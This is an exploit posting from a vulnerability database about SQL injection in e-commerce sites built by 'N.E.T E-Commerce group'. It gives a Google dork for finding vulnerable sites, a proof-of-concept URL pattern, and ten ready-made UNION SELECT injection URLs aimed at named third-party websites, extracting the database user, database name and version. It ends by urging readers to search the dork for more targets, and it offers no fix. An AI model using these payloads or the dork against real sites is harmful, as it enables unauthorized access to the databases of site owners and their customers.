N.E.T E-Commerce group - SQL Injection Vulnerability

2016.04.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================================================== # Exploit Title: N.E.T E-Commerce group - SQL Injection Vulnerability # Exploit Author: Blackwolf_Iran # Date: 2016-03-30 # Email: blackwolf@post.com # Vendor Homepage: http://www.iranmc.com/ |==================================================================================== # {DORK} # intext:"Designed And developed By N.E.T E-Commerce group" inurl:cat.php?id= |==================================================================================== # {POC} # http://www.site.com/cat.php?id=36[SQL Injection] |==================================================================================== # {DEMO} # 01: http://www.ipda.ir/cat.php?id=-12%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # 02: http://www.atigh.com/cat.php?id=-11%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # 03: http://www.sell.hostblog.ir/cat.php?id=-33%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # 04: http://www.sorenshop3.ir/cat.php?id=-23%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # 05: http://www.ptcparsi.ir/cat.php?id=-37%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # 06: http://www.iranbbs.com/cat.php?id=-36%27+UNION+SELECT+1,2,3,4,5,6,7,database%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # 07: http://www.iranmc.ict1.ir/cat.php?id=-11%27+UNION+SELECT+1,2,3,4,5,6,7,database%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # 08: http://www.iran2.ir/cat.php?id=-13%27+UNION+SELECT+1,2,3,4,5,6,7,database%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # 09: http://www.simka.ir/cat.php?id=-33%27+UNION+SELECT+1,2,3,4,5,6,7,version%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # 10: http://www.dtools.ir/cat.php?id=-26%27+UNION+SELECT+1,2,3,4,5,6,7,version%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+ # # If You Want More Targets! You Can Search Dork in GOOGLE! :D |==================================================================================== # {TNX For} # >>> Mr.khatar - Hacker Khan - Ormazd # >>> Discovered By Blackwolf_Iran |==================================================================================== The END ; Good Luck :D:D:D


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top